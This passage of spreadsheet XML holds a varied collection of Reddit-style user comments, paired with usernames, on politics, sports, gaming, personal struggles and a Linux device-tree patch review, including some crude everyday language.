a relatively new phenomenon. Traditionally we've had a series of fractured right-wing parties in this country. It wasn't until 2003 that Harper and MacKay united them all into the modern CPC. &gt; but when our current system is set-to-fail by catering to both sides unanimously, we're going to reach a level of stagnant politics where nothing ever happens, it's going to be EPIC virtue signalling, with no actual action or effort taking place. You already described the last four years. Trudeau's premiership has accomplished extremely little in terms of actually measurable practical benefits to this country in its time in office. &gt; So essentially, this project went from expanding our energy sector to tidewater to reparations for our past sins of a country. We're just consistently dog-piling onto issues without really solving anything. I can see this either taking a ridiculous amount of time or Canada taking a financial hit on the project. I'm actually not opposed to this if done correctly. I think business ventures would be a phenomenal step in the right direction for First Nations communities to improve their quality of life. However, I do think the government should audit the offers and make sure that they're not using federal funding to buy shares in the TMX. The point of us re-selling it to the private sector is to save taxpayer money, not spend it.</t>
  </si>
  <si>
    <t>T-TheCOOKIE</t>
  </si>
  <si>
    <t>Thanks dude I never thought he needed to scream so that it counts.</t>
  </si>
  <si>
    <t>That_Girl_Cray</t>
  </si>
  <si>
    <t>Usually weekly. My hair hair is naturally curly and I have always hated it. I’ve been straightening it regularly since I was 17 and I’m 31 now. In the summer less because there’s no point in straightening it the heat and humidity will just curl it back up as soon as I go outside. So most of the time I’m just wearing it in a bun. I protect it as best I can but it’s definitely damaged. Thinned out a lot and doesn’t grow past a certain length. I always wanted to just be able to wash my hair or get it wet and let it dry straight and long. But no that’ll never happen.</t>
  </si>
  <si>
    <t>porb121</t>
  </si>
  <si>
    <t>good news is the world's best top laners probably won't be at worlds. LPL: Zoom and Flandre are gone, none of FPX/TES/BLG/RNG have super elite top laners, IG is looking questionable and might not qualify. LCK: Doran is meh, and whoever comes out of the gauntlet can't get seeded with SKT in groups, though Summit/Kiin/Nuguri are all very strong. LCS: Licorice is good? Impact and Brokenblade/Huni/Ruin aren't very threatening. LEC: Strong group of top laners, but nobody world-class. Biggest fear is probably Wunder-Jankos and Bwipo-Broxah top/jg duos, but in lane he shouldn't be too scared.</t>
  </si>
  <si>
    <t>GiggleMaster</t>
  </si>
  <si>
    <t>I use this for my minecraft server. The performance is absolutely horrid. For only $5,000 more you can get the 128C/256T EPYC 9930 that'll more than double your performance.</t>
  </si>
  <si>
    <t>crackly_b0i</t>
  </si>
  <si>
    <t>Yeah totally bullshit</t>
  </si>
  <si>
    <t>prolifik</t>
  </si>
  <si>
    <t>Keeper gets injured half an hour in, 24 points sitting on my bench. Why the **** do I keep signing up for this game?</t>
  </si>
  <si>
    <t>soclydeza84</t>
  </si>
  <si>
    <t>Explain to them how philosophical thought lead to the development of the very fields they are in, tell them some people are more interested in the deeper development of ideas that they were taught and employ everyday than exploiting them for money. Take each one of their professions/fields and explain some of the core ideas that relate to it. Mathematics, science, engineering, medicine, etc., were at one point considered "natural philosophy" before breaking away into their respective specialized field.</t>
  </si>
  <si>
    <t>OutForSupper</t>
  </si>
  <si>
    <t>I have lived at the row in the past. Would not recommend. They can take up to a month to actually come by and service your maintenance request. Also, should this even be allowed on this subeddit?</t>
  </si>
  <si>
    <t>Jin</t>
  </si>
  <si>
    <t>Selling this in perfect condition digital piano. No damages at all, seldom played, working as a new digital piano. Comes with a user's guide. Pick up in Dingley Village.</t>
  </si>
  <si>
    <t>SuperIsaiah</t>
  </si>
  <si>
    <t>No, god would, essentially, not because he gives a crap what you roll, but because he created the earth and thus created the environment affecting what that die hits. Demons didn't create the earth so the logic doesnt apply</t>
  </si>
  <si>
    <t>RickyRubiOops</t>
  </si>
  <si>
    <t>A psn friend. The video edits are really funny btw</t>
  </si>
  <si>
    <t>khedoros</t>
  </si>
  <si>
    <t>&gt; They're file descriptors numbered 1, 2, and 3, respectively I thought that in, out, and error were 0, 1, and 2?</t>
  </si>
  <si>
    <t>Mericelli</t>
  </si>
  <si>
    <t>NTA. He has a problem that he needs to work out. You did the right thing for outing him because the fact that he is hiding it is really scary. I’m proud of you for doing that and DO NOT FEEL GUILTY!</t>
  </si>
  <si>
    <t>Bulldog</t>
  </si>
  <si>
    <t>Kabalevsky - Preludes and Fugues (6) for piano, op. 61 - 31 Kabalevsky - Cello Sonata in B flat major, op. 71 - 1 Kabalevsky - Piano Concerto no. 1, op. 9 - 13 (+3) Kabalevsky - Romeo and Juliet Suite, op. 56 - 0 Kabalevsky - Symphony no. 3 ("Requiem for Lenin"), op. 22 - 8 Khachaturian - Toccata - 16 Khachaturian - Trio for Clarinet, Violin, and Piano - 12 (+4) Khachaturian - Piano Concerto - 48 (+3) Khachaturian - Ode in memory of Lenin - 1 Khachaturian - The battle of Stalingrad - 0</t>
  </si>
  <si>
    <t>AlfieBCC</t>
  </si>
  <si>
    <t>I think the difference is probably Nick Foles is not one of the worst starting QBs in the NFL. I could be wrong.</t>
  </si>
  <si>
    <t>CrickInTheNorth</t>
  </si>
  <si>
    <t>This is the Bengals situation as well. Even if Dalton underperforms with Taylor and it's clearly time to move on, the roster has too much talent for them to end up with a top 5 pick, contrary to popular opinion. I firmly believe it's much more likely they land in the mediocre 6-8 win range just outside of a premium pick. The difference is the Colts would actually be willing to spend picks and players to move up. The Bengals would never.</t>
  </si>
  <si>
    <t>Skipper7410</t>
  </si>
  <si>
    <t>Sometimes I think I gave up way too easy but it's all good now Haha. All though glasses seriously suck!</t>
  </si>
  <si>
    <t>willowpopstar</t>
  </si>
  <si>
    <t>Just do your best here on out. Missing those points should be motivation enough to kick ass in the class.</t>
  </si>
  <si>
    <t>Jeez_Louise_loulou</t>
  </si>
  <si>
    <t>My dude has used the maximum likes allowed in 24h. Did not pay for Tinder plus/gold. Tinder in hard mode confirmed.</t>
  </si>
  <si>
    <t>nedmaster</t>
  </si>
  <si>
    <t>Jesus was buried in the US and the president wants his body for personal reasons. It's during the 1890s and he uses a horse race as a way to draw people's attention away from jesus, one of the villains can turn into a dinosaur.</t>
  </si>
  <si>
    <t>MemeInvestor_bot</t>
  </si>
  <si>
    <t>*8,729,840,782,172,004 MemeCoins invested @ 0 upvotes* Your investment is active. I'll evaluate your return in 4 hours and update this comment. Stay tuned! Your current balance is **0 MemeCoins**.</t>
  </si>
  <si>
    <t>Mrausername</t>
  </si>
  <si>
    <t>They've used draft picks but removed proven commodities and salaries. I don't think anyone can say that's an upgrade at this point but, of course, it might turn out to be. I'm surprised you all seem on board with Gettelman's decisions. Is that what too much media criticism coupled with pre season optimism does for you?</t>
  </si>
  <si>
    <t>Doctor_YOOOU</t>
  </si>
  <si>
    <t>Farmers are losing the most, but we are all losing in the trade war. Prices will be higher for goods we need, and employers are losing out too (see US Steel which was supposed to be "protected" by tariffs but instead is starting to lay off workers) https://pittsburgh.cbslocal.com/2019/08/23/pittsburgh-based-us-steel-expects-150-layoffs-at-indiana-plant/ Tariffs are a tax on consumers - that's you and me, and they're not necessary for a healthy economy.</t>
  </si>
  <si>
    <t>tristn9</t>
  </si>
  <si>
    <t>Lmao chill people it’s obviously a joke holy shit</t>
  </si>
  <si>
    <t>HenzoTheGreat</t>
  </si>
  <si>
    <t>Ill take that porzingis if you don’t like it lol</t>
  </si>
  <si>
    <t>Fuzzikopf</t>
  </si>
  <si>
    <t>Pretty dumb IMO, he's already viable in pro play currently. If they buff him too much, he will just be permabanned at worlds.</t>
  </si>
  <si>
    <t>GenesisProTech</t>
  </si>
  <si>
    <t>It's absolutely amazing in person</t>
  </si>
  <si>
    <t>An-Indian-In-The-NBA</t>
  </si>
  <si>
    <t>We're on a good path. It won't be long untill my username is true again.</t>
  </si>
  <si>
    <t>emailfront11</t>
  </si>
  <si>
    <t>What self respecting Jesus takes the escalator with his cross?</t>
  </si>
  <si>
    <t>HardKnuckleSpikes</t>
  </si>
  <si>
    <t>As long as Galeem's light tendrils aren't multihit I can just focus through it</t>
  </si>
  <si>
    <t>McSaxual34</t>
  </si>
  <si>
    <t>That signing got him into the hall of fame</t>
  </si>
  <si>
    <t>armeniandood</t>
  </si>
  <si>
    <t>thanks.. my self esteem isn't so great so I thought that I may be the problem and not be interesting. thanks again for telling me that :) I appreciate the fact that people here on Reddit are very kind, makes me feel better :D</t>
  </si>
  <si>
    <t>jffnc11</t>
  </si>
  <si>
    <t>“Modern science”, this definietly doesn’t have anything to do with actual science, such as psychology, except in terms of studying mental disorders. And why is anything on this sub anyone’s fucking business? If people “minded their own business” this sub wouldn’t have many posts now would it? And I really don’t get what you’re trying to imply with your sentence about church.</t>
  </si>
  <si>
    <t>okis13</t>
  </si>
  <si>
    <t>I preshaded black on top of Tamiya primer and used Tamiya gunship grey (decanted) thin layers and postshaded with Tamiya smoke heavily thinned. Hope this helps.</t>
  </si>
  <si>
    <t>roemer2k4_TTV</t>
  </si>
  <si>
    <t>and roblox porn, great crossover</t>
  </si>
  <si>
    <t>Rowan_cathad</t>
  </si>
  <si>
    <t>MMOs don't really have good stories or sequels by and large</t>
  </si>
  <si>
    <t>disownedpear</t>
  </si>
  <si>
    <t>Aren't the trims gone for good now?</t>
  </si>
  <si>
    <t>ItsHassan47</t>
  </si>
  <si>
    <t>Also many trains are atleast 10 hours behind the schedule Sheikh Rasheed only know how to talk shit.</t>
  </si>
  <si>
    <t>screech_owl_kachina</t>
  </si>
  <si>
    <t>&gt; a “scalpel handling surcharge” when I get a Tonsillectomy Except they do that lol.</t>
  </si>
  <si>
    <t>JRCee</t>
  </si>
  <si>
    <t>Yeah, looking at around 3.6k - 4.3k (7k at the dealership haha) to get it running like I would want it again. Runs and drives fine but the clutch (1.1k+-) will be useless within a year and the turbos (2.5k+ w labor) are probably about gone as well (this would be the 2nd time I’ve replaced them in 2 years)</t>
  </si>
  <si>
    <t>We just got a random crossover on the JP server with unit skins.</t>
  </si>
  <si>
    <t>brutalethyl</t>
  </si>
  <si>
    <t>So a petty thief should just be allowed to steal. Yeah. Get back to me when they're stealing from you.</t>
  </si>
  <si>
    <t>eams_</t>
  </si>
  <si>
    <t>My husband was an alcoholic. During the course of our relationship, his drinking habits progressively got worse. This always upset me. Shortly after he took his life last year, I turned to drinking much more regularly than I ever have because it quelled the stress I felt. Now I binge drink at least a few times per week. I can’t actually account for how many consecutive days I’ve been sober in the past year and a half whereas previously I was able to drink only on weekends. I’ve stopped exercising and my teeth have become stained. At my friend’s wedding last week, I got drunk and cried in front of a large group of people. I drank two bottles of wine last night and blacked out for the second time this week. As I’m typing this, I cannot believe this is my story. I decided today, at least for today, I want to stop. I’m hurting myself.</t>
  </si>
  <si>
    <t>Working how? On your own? I’m reluctant to go into therapy, I had one session and I’m exhausted. But I think maybe I have to.</t>
  </si>
  <si>
    <t>khandoker33</t>
  </si>
  <si>
    <t>What’s gonna happen to my cookies if I accidentally use baking soda when it called for baking powder?</t>
  </si>
  <si>
    <t>karthikn774</t>
  </si>
  <si>
    <t>Nothing found in that dropbox link</t>
  </si>
  <si>
    <t>KnLfey</t>
  </si>
  <si>
    <t>I do not get such results on my Raven... It seems to just half their shields as they continue flying normally...</t>
  </si>
  <si>
    <t>P_SHERMAN_420</t>
  </si>
  <si>
    <t>https://www.merriam-webster.com/dictionary/racism</t>
  </si>
  <si>
    <t>movieman94</t>
  </si>
  <si>
    <t>This comment being buried in downvotes is an embarrassing look for this sub.</t>
  </si>
  <si>
    <t>Youwillgetoverit</t>
  </si>
  <si>
    <t>lol, hilarious so many people scramble to the ER for a cat bite. Wash it and move on with life! These pansies running to the ER for a scratch is part of the reason american healthcare is so expensive. Stop going for stupid shit people, learn some basics about self care for non issues like these scratches and light bite.</t>
  </si>
  <si>
    <t>sneakynin</t>
  </si>
  <si>
    <t>There were so many moments that could have taken a less than PG comedic turn. I wish they didn't have to hold back, but I know a lot of people prefer the PG/PG-13 GMM.</t>
  </si>
  <si>
    <t>randy500</t>
  </si>
  <si>
    <t>I dont sell marginal or unuseable parts without explaining those facts, the 4 core mounts and brackets are solid Need lower rubber inserts tho.</t>
  </si>
  <si>
    <t>duongquang62729</t>
  </si>
  <si>
    <t>الفتاة الحكيمة | The Wise Maiden Story in Arabic | Arabian Fairy Tales #72</t>
  </si>
  <si>
    <t>lupistek</t>
  </si>
  <si>
    <t>I am thinking to return to Guild Wars 2 after long time, but I am kinda tired of running in openworld. Should I just use my 80lv boost and try some raids? I was thinking of making boons chronomancer mesmer.</t>
  </si>
  <si>
    <t>Controversial_Karen</t>
  </si>
  <si>
    <t>It is sad that this became an actual debate in the comments.</t>
  </si>
  <si>
    <t>ToiletofSadness</t>
  </si>
  <si>
    <t>oracledragon said: Is the Hoonigan RS200 worth it to buy with Forzathon points? I have around 2.5K or so. I have the normal RS200 upgraded to S2998. I've done all of the danger zones, etc where the RS200 was great. But you can't seem to buy the Hoonigan one, is it super rare and I should definitely get it from the Forzathon store before it is gone? Or it's really not a big deal since everything is 3-starred and I have the regular RS200? Click to expand... Click to shrink... If you do the weekly playlist events, a fully-upgraded hoonigan rs200 is usually the easiest vehicle to nail the danger jumps in.</t>
  </si>
  <si>
    <t>hieu1004</t>
  </si>
  <si>
    <t>His voice is fine in The Animated series, but IMO, I don’t think he translates well to live action. He played The Trickster in The Flash TV series and was pretty terrible.</t>
  </si>
  <si>
    <t>Blob97</t>
  </si>
  <si>
    <t>I always use an Xbox controller attached with USB, for some reason the game always suddenly stops recognising it and some of the buttons work but for example the right stick is like sensitivity has been put to 0 and it’s frustrating having to open and close every time this Happens. any fixes? Thanks</t>
  </si>
  <si>
    <t>_ASassyWeeb_</t>
  </si>
  <si>
    <t>As long as I can see it coming</t>
  </si>
  <si>
    <t>Hamplaneteer</t>
  </si>
  <si>
    <t>[We are now step dancing around the baby](https://imgur.com/a/LLLKWSK)</t>
  </si>
  <si>
    <t>the-dandy-man</t>
  </si>
  <si>
    <t>Hopefully combat will be the next big overhaul</t>
  </si>
  <si>
    <t>sscilli</t>
  </si>
  <si>
    <t>Seriously. There's an article on there today about how FDR wouldn't have liked Sanders or AOC. It's pretty astounding.</t>
  </si>
  <si>
    <t>asdeasde96</t>
  </si>
  <si>
    <t>And my ax!</t>
  </si>
  <si>
    <t>sepulchresofgod</t>
  </si>
  <si>
    <t>How about money? Lol a RC YouTuber? Guarantee that dude is a money grubbing whore so trying to scam people seems easily possible</t>
  </si>
  <si>
    <t>neubs</t>
  </si>
  <si>
    <t>my old flip phone</t>
  </si>
  <si>
    <t>Jartasm</t>
  </si>
  <si>
    <t>Hoo boy, when the Angel Statue pops up over the clouds. And you descend into the church and see your own reflection... What a masterpiece.</t>
  </si>
  <si>
    <t>Valrog</t>
  </si>
  <si>
    <t>I want Adrian's death to be explained satisfactorily. He defeated Demogorgon and all the Bhaalspawn only to refuse godhood. I do not want him to have been slain by some noobs. It had better be a satisfactory explanation.</t>
  </si>
  <si>
    <t>CoolUsername185</t>
  </si>
  <si>
    <t>You only have that because you said you barely started which is why you only have greys</t>
  </si>
  <si>
    <t>FoxyGrampa</t>
  </si>
  <si>
    <t>I really love this picture for some reason. He looks like the goodest boy.</t>
  </si>
  <si>
    <t>poe-tat-toe</t>
  </si>
  <si>
    <t>You just got to try, to say words that don’t start with that, also runons add to your mix, lots of words got ways to say it without saying your avoided word. I could have gone on</t>
  </si>
  <si>
    <t>misak</t>
  </si>
  <si>
    <t>Thanks for the reply Pondus, much appreciated. To answer your question, no the infected exe was not run from within the ZIP, extracted by any tool or extracted and run from a different location, I think this is one of the reasons why AVAST did not pick it up. From memory AVAST did not pick it up either when the .exe installer was run or when it fully installed the small program (this was a long time ago). However it did pick it up when the small program was run. That's all I can recall, apart from it being a W32. something infection of some sort. As it was from a supplier in China I suspect it was most definitely some sort of Virus/Malware/Adware or the likes as things like this has happened before but have been caught on download rather that later on in the process. Probably worth mentioning I have done several full system boot scans and all was clear! Thanks again for your comment. Caleb</t>
  </si>
  <si>
    <t>Lowtech00</t>
  </si>
  <si>
    <t>It's so retarded it's hard to grasp how they came to that conclusion.</t>
  </si>
  <si>
    <t>Srixxis</t>
  </si>
  <si>
    <t>Haha... Get that under wraps lil Bros. Can get dangerous.</t>
  </si>
  <si>
    <t>gilles210</t>
  </si>
  <si>
    <t>You will love tilt brush if you're creative you wil not look for the blury parts some times for me I think the graphics are good enough and if you don't like the graphics in 30 minutes you can always ask for refund (don't know the policy exactly)</t>
  </si>
  <si>
    <t>rplgamer</t>
  </si>
  <si>
    <t>because people like originality, not a kingdom that’s been built b4. the thing he’s stuck in is genius.</t>
  </si>
  <si>
    <t>brother_grinch</t>
  </si>
  <si>
    <t>Daddylong legs are not venomous they just aren't some people think they cant hurt you because they are to small but even if they were big it would only hurt and probley not kill</t>
  </si>
  <si>
    <t>Fishchowdar</t>
  </si>
  <si>
    <t>I think it was aliens communicating with us to try and find the most genius members of our species, abduct them and then help them create a perfect society</t>
  </si>
  <si>
    <t>PierreLunaire</t>
  </si>
  <si>
    <t>**Title** *A work Commisioned by:*</t>
  </si>
  <si>
    <t>lannisterstark</t>
  </si>
  <si>
    <t>Curious, what's the deal with ASW?</t>
  </si>
  <si>
    <t>SpankBankManager</t>
  </si>
  <si>
    <t>FiLL tHe SwAmP!</t>
  </si>
  <si>
    <t>locoenglazy</t>
  </si>
  <si>
    <t>I call bulshit, I reckon that dude with the pick axe is superimposed over the portaloo. At no point, ever, in my 44 years in the UK have I seen any road worker handling a tool.</t>
  </si>
  <si>
    <t>223_556_1776</t>
  </si>
  <si>
    <t>Yeah everyone at work always says they're coming to my place in a crisis. They don't know where I live and it'll stay that way.</t>
  </si>
  <si>
    <t>override367</t>
  </si>
  <si>
    <t>yikes why is everyone getting downvoted, its like the elves in divinity original sin 2 who devour loved ones whove died to honor them, it doesnt make them evil, it's just a totally different cultural attitude</t>
  </si>
  <si>
    <t>justfang</t>
  </si>
  <si>
    <t>I saw JapEn first! [https://www.youtube.com/watch?v=c3ddIoziQ\_U](https://www.youtube.com/watch?v=c3ddIoziQ_U) more than 10 years ago, then I found UPSB and the rest is history! ;)</t>
  </si>
  <si>
    <t>We remove direct links to crowdfunding campaigns. This guide explains how to post [about one](https://www.reddit.com/r/boardgames/wiki/contribution-guides#wiki_share_a_game_undergoing_crowdfunding_or_a_pre-orderable_game) *I am a bot, and this action was performed automatically. Please [contact the moderators of this subreddit](/message/compose/?to=/r/boardgames) if you have any questions or concerns.*</t>
  </si>
  <si>
    <t>SocraticIgnoramus</t>
  </si>
  <si>
    <t>Save it for your pornhub channel lady! Seriously though, I’m into it... call me...</t>
  </si>
  <si>
    <t>saturatedsteam</t>
  </si>
  <si>
    <t>Yeah, cats love friends with boundaries.</t>
  </si>
  <si>
    <t>Compatibilist</t>
  </si>
  <si>
    <t>For some reason, recently an incredibly stupid and cringe-worthy behavior began to take hold: to honk one's horn for like a minute in acknowledgement of the W hour. Never change polacks. Your cringeworthiness is the stuff of modern lore.</t>
  </si>
  <si>
    <t>truemeliorist</t>
  </si>
  <si>
    <t>It all makes sense of you view Trump as a Russian puppet. After all, [guess who secured the agriculture import business with China](https://www.reuters.com/article/us-usa-trade-china-agriculture-idUSKCN1UL275). Damage the US, send a bunch of business to Russia. Follow the money.</t>
  </si>
  <si>
    <t>Laurent Pinchart</t>
  </si>
  <si>
    <t>Hi Fabrizio, On Thu, Aug 15, 2019 at 12:04:25PM +0100, Fabrizio Quote: : &gt; Dual-link LVDS displays have two ports, therefore document this &gt; with the bindings. &gt; &gt; Signed-off-by: Fabrizio Castro &gt; &gt; --- &gt; v1-&gt;v2: &gt; * Reworked the description of the ports property &gt; * lvds0_panel_in in the example has been renamed to panel_in0 &gt; * lvds1_panel_in in the example has been renamed to panel_in1 &gt; &gt; Laurent, &gt; &gt; in linux-next they are now working with: &gt; Documentation/devicetree/bindings/display/panel/lvds.yaml Documentation/devicetree/bindings/display/panel/lvds.yaml is in drm-misc-next, so I would advise rebasing on top of that. &gt; What should I do here? &gt; &gt; .../bindings/display/panel/panel-lvds.txt | 95 &gt; 1 file changed, 71 insertions(+), 24 deletions(-) &gt; &gt; diff --git a/Documentation/devicetree/bindings/display/panel/panel-lvds.txt b/Documentation/devicetree/bindings/display/panel/panel-lvds.txt &gt; index 250850a..5231243 100644 &gt; --- a/Documentation/devicetree/bindings/display/panel/panel-lvds.txt &gt; +++ b/Documentation/devicetree/bindings/display/panel/panel-lvds.txt &gt; @@ -41,7 +41,12 @@ Required nodes: &gt; &gt; - panel-timing: See panel-common.txt. &gt; - ports: See panel-common.txt. These bindings require a single port subnode &gt; - corresponding to the panel LVDS input. &gt; + (for a single link panel) corresponding to the panel LVDS input, or two port &gt; + subnodes (for a dual link panel) corresponding to the panel LVDS inputs. &gt; + Dual-link LVDS panels expect even pixels (0, 2, 4, etc.) and odd pixels (1, 3, &gt; + 5, etc.) on different input ports, it's up to the panel-specific bindings to &gt; + specify what port is expecting even pixels, and what port is expecting odd &gt; + pixels. &gt; &gt; &gt; LVDS data mappings are defined as follows. &gt; @@ -92,30 +97,72 @@ CTL3: 0 &gt; Example &gt; &gt; &gt; -panel { &gt; - compatible = "mitsubishi,aa121td01", "panel-lvds"; &gt; - &gt; - width-mm = &lt;261&gt;; &gt; - height-mm = &lt;163&gt;; &gt; - &gt; - data-mapping = "jeida-24"; &gt; - &gt; - panel-timing { &gt; - /* 1280x800 @60Hz */ &gt; - clock-frequency = &lt;71 &gt;; &gt; - hactive = &lt;1280&gt;; &gt; - vactive = &lt;800&gt;; &gt; - hsync-len = &lt;70&gt;; &gt; - hfront-porch = &lt;20&gt;; &gt; - hback-porch = &lt;70&gt;; &gt; - vsync-len = &lt;5&gt;; &gt; - vfront-porch = &lt;3&gt;; &gt; - vback-porch = &lt;15&gt;; &gt; +Single port: &gt; + panel { &gt; + compatible = "mitsubishi,aa121td01", "panel-lvds"; &gt; + &gt; + width-mm = &lt;261&gt;; &gt; + height-mm = &lt;163&gt;; &gt; + &gt; + data-mapping = "jeida-24"; &gt; + &gt; + panel-timing { &gt; + /* 1280x800 @60Hz */ &gt; + clock-frequency = &lt;71 &gt;; &gt; + hactive = &lt;1280&gt;; &gt; + vactive = &lt;800&gt;; &gt; + hsync-len = &lt;70&gt;; &gt; + hfront-porch = &lt;20&gt;; &gt; + hback-porch = &lt;70&gt;; &gt; + vsync-len = &lt;5&gt;; &gt; + vfront-porch = &lt;3&gt;; &gt; + vback-porch = &lt;15&gt;; &gt; + }; &gt; + &gt; + port { &gt; + panel_in: endpoint { &gt; + remote-endpoint = &lt;&amp;lvds_encoder&gt;; &gt; + }; &gt; + }; &gt; }; &gt; &gt; - port { &gt; - panel_in: endpoint { &gt; - remote-endpoint = &lt;&amp;lvds_encoder&gt;; &gt; +Two ports: &gt; + panel { &gt; + compatible = "advantech,idk-2121wr", "panel-lvds"; &gt; + &gt; + width-mm = &lt;476&gt;; &gt; + height-mm = &lt;268&gt;; &gt; + &gt; + data-mapping = "vesa-24"; &gt; + &gt; + panel-timing { &gt; + clock-frequency = &lt;1485 &gt;; &gt; + hactive = &lt;1920&gt;; &gt; + vactive = &lt;1080&gt;; &gt; + hsync-len = &lt;44&gt;; &gt; + hfront-porch = &lt;88&gt;; &gt; + hback-porch = &lt;148&gt;; &gt; + vfront-porch = &lt;4&gt;; &gt; + vback-porch = &lt;36&gt;; &gt; + vsync-len = &lt;5&gt;; &gt; + }; &gt; + &gt; + ports { &gt; + #address-cells = &lt;1&gt;; &gt; + #size-cells = &lt;0&gt;; &gt; + &gt; + port@0 { &gt; + reg = &lt;0&gt;; &gt; + panel_in0: endpoint { &gt; + remote-endpoint = &lt;&amp;lvds0_out&gt;; &gt; + }; &gt; + }; &gt; + &gt; + port@1 { &gt; + reg = &lt;1&gt;; &gt; + panel_in1: endpoint { &gt; + remote-endpoint = &lt;&amp;lvds1_out&gt;; &gt; + }; &gt; + }; &gt; }; &gt; }; &gt; -}; -- Regards, Laurent Pinchart</t>
  </si>
  <si>
    <t>ForrestHunt</t>
  </si>
  <si>
    <t>Good ideas, thanks!</t>
  </si>
  <si>
    <t>SummerTime1987</t>
  </si>
  <si>
    <t>If something was done, explain to me why there have been 250+ shootings in 2019 already in America. Please. I await your incompetent answer.</t>
  </si>
  <si>
    <t>Jonbeez</t>
  </si>
  <si>
    <t>Is it just a shader, or are there mods at work here? I love the specular highlights on the ground and stuff!</t>
  </si>
  <si>
    <t>NobodySpecific</t>
  </si>
  <si>
    <t>Nah, he's a cop too so it'll be covered up</t>
  </si>
  <si>
    <t>Ledbetter2</t>
  </si>
  <si>
    <t>This is cool</t>
  </si>
  <si>
    <t>dragonfliesloveme</t>
  </si>
  <si>
    <t>Oh shit. Well you be safe, excellent that you’re hanging the storm shutters</t>
  </si>
  <si>
    <t>bawki</t>
  </si>
  <si>
    <t>I remember when they said multiplayer is coming with 1.0. If they don't deliver this time I won't consider buying it.</t>
  </si>
  <si>
    <t>SmallYTChannelBot</t>
  </si>
  <si>
    <t>Thank you for submitting to /r/SmallYTChannel. Unfortunally, you submission has been removed since you do not have enough λ. You need 3λ to post. You currently have 0λ. For more information, read the [FAQ.](https://www.reddit.com/user/SmallYTChannelBot/comments/a4u7qj/smallytchannelbot_faq/) ^/u/SmallYTChannelBot ^*made* ^*by* ^/u/jwnskanzkwk. ^*PM* ^*for* ^*bug* ^*reports.* ^*For* ^*more* ^*information,* ^*read* ^*the* ^[FAQ.](https://www.reddit.com/user/SmallYTChannelBot/comments/a4u7qj/smallytchannelbot_faq/)</t>
  </si>
  <si>
    <t>redshield3</t>
  </si>
  <si>
    <t>Brisket prices soar on growing appetite for BBQ</t>
  </si>
  <si>
    <t>MericaMericaMerica</t>
  </si>
  <si>
    <t>Some cards have a broad "entertainment" category, which could be useful, although these are usually at 3% (Capital One Savor, Capitol One SavorOne, Marvel MasterCard, BBVA ClearPoints--which has a quarterly category that can be selected, etc). The U.S. Bank Cash+ allows you to choose two 5% categories each quarter, and has some interesting things like utilities as options. You can select the same categories each quarter if you want. Someone else mentioned the PayPal Cash Back MasterCard, which gives you 2% on all purchases.</t>
  </si>
  <si>
    <t>br1nsk</t>
  </si>
  <si>
    <t>bruh bbs has like the worst plot out of them all like characters only do dumb stuff and don’t communicate properly for no reason until the end.</t>
  </si>
  <si>
    <t>paperandpavement</t>
  </si>
  <si>
    <t>its okay Lucas lived a good life for 16 years i just miss him a lot :)</t>
  </si>
  <si>
    <t>IamSlakks</t>
  </si>
  <si>
    <t>In Vancouver, they have a large asian/chinese population. Same with Seattle and how easy it is to travel for TI while it was at Key Arena. There were lots I agree, but in Shanghai, the viewership in person is probably 90-95% Chinese residents, obviously it'll be different.</t>
  </si>
  <si>
    <t>xItsMeBlueSpot</t>
  </si>
  <si>
    <t>"I'm not like other girls" But I seriously am not like other girls And yes they all say that And yes people hate me for saying it in the first place People hate me for talking in the first place People hate me for existing I don't care about people though</t>
  </si>
  <si>
    <t>travelbug898</t>
  </si>
  <si>
    <t>The only way you can find out is to ask her about it.</t>
  </si>
  <si>
    <t>paul_123</t>
  </si>
  <si>
    <t>Cole's line tonight was like getting chocolate chip cookie dough ice cream and seeing there aren't as many little chocolate chips as your used to. Would you like more chocolate chips? Of course! But you can't complain b/c your getting a mountain of cookie dough ice cream. I stopped by Baskin &amp; Robins today btw</t>
  </si>
  <si>
    <t>VolgTheWhiteFang</t>
  </si>
  <si>
    <t>I play free for all with my friends alot. Usually its 5-6 people in and Imo and the same goes for my friends since we tried time for a bit and no one liked it stock &gt; time. If there are like 2-3 heavies in the game its legitimately super hard to get a win if you aren't one of the heavies. I play dedede and sometimes random forward smashes just obliterate multiple people in one go. My aerials could easily steal kills someone was working on as well. Heavies kinda just ruin time as a mode imo, most games has heavies getting the most stocks because their stray hits kill way easier.</t>
  </si>
  <si>
    <t>metalflygon08</t>
  </si>
  <si>
    <t>"Snape often asks if we got to the cloud district, we always scoffed at his lame attempt at a joke, we soon learned the error of our ways..."</t>
  </si>
  <si>
    <t>forgedWood</t>
  </si>
  <si>
    <t>I agree something needs to be done, but even background checks wouldn't solve the problem because they could still get a gun illegally and there's no group that wouldn't put up a fight (with the help of the NRA), ex-cons, where do you draw the line of mental illness, suicidal or schizophrenia. I don't like that you're argument ends with the goverment nuking it's own people. We aren't that far into the "future" as you might think. If individuals are allowed to carry guns then something like the Tienanmen square massacre shouldn't be able to happen here. Conservative Americans mainly don't want goverment to get in the way of their lives. It seems like what's happening is America has made guns available to many to many people across the world and has made an art form of taking their customers out. America without guns no longer has any defense power, they'd be like Britain. We're against war but it's all we were good at and now Russia and China are hacking us and buying us and we have no idea what to do. Having an exterior enemy would greatly help, having new low-skilled jobs would too. I also blame the Kardashians.</t>
  </si>
  <si>
    <t>ride_whenever</t>
  </si>
  <si>
    <t>Buy a 27.5 non-boost hope wheel and you can convert down. Best hubs available in my opinion.</t>
  </si>
  <si>
    <t>h4ppyj3d1</t>
  </si>
  <si>
    <t>You are already banned in their forum even if you don't use it :V</t>
  </si>
  <si>
    <t>AnnetteXyzzy</t>
  </si>
  <si>
    <t>You're grieving. I shouldn't have made it sound like such a crime because grief makes us do all kinds of things. &gt;I had been missing him since the breakup and never stopped caring about him, and I was feeling very vulnerable and was wishing I had someone there for me in the capacity he used to be. I thought that my father's passing would somehow bring us together again in some way (my father was very fond of him). You didn't phrase it wrong.</t>
  </si>
  <si>
    <t>Chappers88</t>
  </si>
  <si>
    <t>It never has done in the pass, it won’t now.</t>
  </si>
  <si>
    <t>DrMeridian</t>
  </si>
  <si>
    <t>This article gets a little too semantic on what qualifies as a mass shooting. 4 or more people being shot is a mass shooting. But what about mass mass shootings, let's say 10 or more victims or 20 or more victims or how about 30 or more victims. Not all mass shootings are equal. But great, now we have to figure out qualifications for mass shooting.</t>
  </si>
  <si>
    <t>percykins</t>
  </si>
  <si>
    <t>Quite the opposite. This is the [10 yr-2 yr inversion](https://fred.stlouisfed.org/graph/?g=oCOn). The [10 yr-3 mo curve](https://fred.stlouisfed.org/graph/?g=oCOo) has been inverted since May.</t>
  </si>
  <si>
